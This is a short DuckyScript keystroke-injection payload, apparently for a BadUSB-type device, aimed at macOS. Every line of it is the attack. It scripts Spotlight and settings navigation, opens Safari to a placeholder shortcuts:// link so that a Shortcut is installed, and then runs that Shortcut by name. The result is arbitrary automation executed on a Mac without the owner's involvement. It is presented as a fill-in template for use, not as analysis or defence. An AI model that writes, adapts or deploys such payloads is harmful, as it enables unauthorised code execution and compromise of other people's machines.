
DEFINE #URL shortcuts://shortcuts/(PLACE YOUR SHORTCUT ID HERE)
DEFINE #SHORTCUT_NAME (PLACE YOUR SHORTCUT NAME HERE)

REM for example: #URL shortcuts://shortcuts/000000000000000000
REM for example: #URL shortcuts://shortcuts/Shortcut.name

REM this payload is assuming you have enabled full keyboard access enabled before running

DEFAULT_DELAY 500
REM -------------
REM Part #1
REM -------------
DELAY 3000
GUI SPACE
STRING Legal Notices
DELAY 1000
ENTER
DELAY 1000
SPACE
DELAY 1000
REPEAT 5 DOWN
DELAY 550
SPACE
DELAY 750
SPACE
DELAY 250
DOWN
DELAY 100
SPACE
DELAY 750
REM -------------
REM Part #1
REM -------------
GUI SPACE
STRING Safari
ENTER
DELAY 750
GUI n
GUI l
STRING #URL
DELAY 250
ENTER
UP
RIGHT
DELAY 250
SPACE
REM -------------
REM Part #2
REM -------------
DELAY 3000
REPEAT 3 DOWN
SPACE
GUI SPACE
REM -------------
REM Part #3
REM -------------
DELAY 1000
STRING Safari
ENTER
DELAY 750
GUI n
GUI l
STRING shortcuts://run-shortcut?name=
STRING #SHORTCUT_NAME
DELAY 750
ENTER
UP
RIGHT
DELAY 250
SPACE
DELAY 750
REPEAT 3 DOWN
DELAY 250
SPACE
